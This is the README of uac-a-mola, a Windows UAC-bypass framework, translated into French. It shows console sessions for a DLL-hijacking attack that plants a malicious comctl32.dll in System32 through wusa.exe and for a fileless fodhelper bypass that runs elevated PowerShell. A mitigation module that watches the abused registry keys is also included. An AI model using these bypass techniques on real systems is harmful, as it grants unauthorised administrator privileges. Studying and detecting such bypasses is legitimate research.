
Cadre modulaire pour les attaques de contournement de l'UAC Windows et la mitigation, proposant le détournement de DLL, l'exécution sans fichier et une surveillance en temps réel pour détecter et bloquer les tentatives d'élévation de privilèges.
Pour installer uac-a-mola, vous devez effectuer les actions suivantes :
pip install -r requirements.txt
Uac-a-mola est maintenant prêt à l'emploi ! Vous pouvez tester son fonctionnement en tapant :
cd uacamola
python uacamola.py
Cette section brève explique l'utilisation de certains modules de uac-a-mola :
L'utilisation des modules d'attaque est très simple et ne nécessite guère d'explications. La seule chose à faire est de charger le module correspondant dans le framework à l'aide de la commande load. Vous pouvez voir les options ou les paramètres d'entrée avec la commande show. Avec la commande run , le module est exécuté :
uac-a-mola> load .\modules\attack\dll_hijacking_wusa.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[dll_hijacking_wusa.py]> show
Author
------
|_Pablo Gonzalez (pablo@11paths or @pablogonzalezpe)
Name
----
|_Copy DLL with wusa.exe
Description
-----------
|_It's used for copy a DLL in privilege path (wusa method win7/8/8.1)
Options (Field = Value)
-----------------------
|_name_dll = comctl32.dll (name of DLL)
|
|_binary = compmgmtlauncher.exe (Path to the vulnerable binary)
|
|_malicious_dll = C:\Users\ieuser\Desktop\uac-a-mola\uacamola\payloads\comctl32\comctl32.dll (Path to a malicious dll)
|
|_name_folder = x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2 (Name folder)
|
|_destination_path = C:\Windows\System32 (Destination path)
uac-a-mola[dll_hijacking_wusa.py]> run
[+] Running module...
creating path...
SUCCESS: done
copying dll in path...
SUCCESS: done
creating DDF file...
SUCCESS: done
creating CAB file...
SUCCESS: done
launch wusa.exe /extract
SUCCESS: done! got root? :D
removing path...
SUCCESS: done
uac-a-mola[dll_hijacking_wusa.py]>
Et un autre exemple :
uac-a-mola> load modules\attack\fileless_fodhelper.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[fileless_fodhelper.py]> show
Author
------
|_Santiago Hernandez Ramos
Name
----
|_Fileless Fodhelper
Description
-----------
|_Fileless - Fodhelper bypass UAC
Options (Field = Value)
-----------------------
|_instruction = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C echo mola > c:\pwned.txt (Elevated Code)
uac-a-mola[fileless_fodhelper.py]> set instruction powershell.exe
uac-a-mola[fileless_fodhelper.py]> run
[+] Running module...
L'utilisation des méthodes de mitigation est également assez simple, mais elles ont une structure interne légèrement plus complexe qui sera expliquée dans cette section. En ce qui concerne leur utilisation, la première chose à faire est de charger le module de mitigation disponible :
uac-a-mola> load modules\mitigation\bypass_mitigation.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[bypass_mitigation.py]> show
Author
------
|_Santiago Hernandez Ramos
Name
----
|_This module will instrument the binaries selected and detect possible UAC bypasses
Description
-----------
|_Bypass Mitigation
Options (Field = Value)
-----------------------
|_[REQUIRED] password = None (Password for connection)
|
|_[REQUIRED] binlist_file = None (File with a list of binaries to hook, one on each line)
|
|_port = 5555 (Port for connection)
Dans ce cas, nous devrons définir un mot de passe que les agents utiliseront pour communiquer avec l'écouteur qui sera exécuté dans le framework uacamola. Nous pouvons trouver les agents dans le chemin uacamola/support/agents. En ouvrant ces fichiers, nous pouvons voir le mot de passe :
fodhelper_ag = Agent('fodhelper.exe', 'localhost', 5555, 'uacamola')
fodhelper_ag.send_forbidden("Software\\Classes\\ms-settings\\Shell\\Open\\command")
uacamola sera le mot de passe utilisé pour l'authentification et la communication, mais nous pouvons le changer. L'autre paramètre requis est un chemin vers un fichier contenant une liste de binaires à surveiller. Ces binaires doivent avoir un fichier agent.pyw dans les chemins des agents.
uac-a-mola[bypass_mitigation.py]> show
Author
------
|_Santiago Hernandez Ramos
Name
----
|_This module will instrument the binaries selected and detect possible UAC bypasses
Description
-----------
|_Bypass Mitigation
Options (Field = Value)
-----------------------
|_password = uacamola (Password for connection)
|
|_binlist_file = bins.txt (File with a list of binaries to hook, one on each line)
|
|_port = 5555 (Port for connection)
uac-a-mola[bypass_mitigation.py]> run
[+] Running module...
[+] Executing the listener...
--- Press ENTER for quit mitigate mode ---
En remplissant ces champs et en exécutant la commande run, uacamola commencera à surveiller toute l'activité liée au contournement de l'UAC dans les binaires qui apparaissent dans la liste. Si une activité dangereuse est détectée, il élaguera automatiquement la branche dangereuse (du système de fichiers ou du registre) et exécutera le binaire de manière sécurisée. Pour quitter ce mode, il suffit d'appuyer sur la touche ENTER.
Veuillez signaler toute erreur à [email protected] ou ouvrez simplement un problème sur GitHub. Votre collaboration est appréciée !
LE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS MAIS SANS S'Y LIMITER LES GARANTIES DE QUALITÉ MARCHANDE, D'ADAPTATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. EN AUCUN CAS LES AUTEURS OU TITULAIRES DU DROIT D'AUTEUR NE POURRONT ÊTRE TENUS RESPONSABLES DE TOUTE RÉCLAMATION, DOMMAGE OU AUTRE RESPONSABILITÉ, QUE CE SOIT DANS LE CADRE D'UNE ACTION CONTRACTUELLE, DÉLICTUELLE OU AUTRE, DÉCOULANT DE, OU EN RELATION AVEC LE LOGICIEL OU SON UTILISATION, OU D'AUTRES INTERACTIONS AVEC LE LOGICIEL. LORSQUE VOUS APPORTEZ UNE CONTRIBUTION À UN DÉPÔT CONTENANT UN AVIS DE LICENCE, VOUS LICENCIEZ VOTRE CONTRIBUTION SOUS LES MÊMES CONDITIONS, ET VOUS RECONNAISSEZ AVOIR LE DROIT DE LICENCIER VOTRE CONTRIBUTION SOUS CES CONDITIONS. SI VOUS AVEZ UN ACCORD SÉPARÉ POUR LICENCIER VOS CONTRIBUTIONS SOUS DES CONDITIONS DIFFÉRENTES, TEL QU'UN ACCORD DE LICENCE DE CONTRIBUTEUR, CET ACCORD PRÉVAUDRA.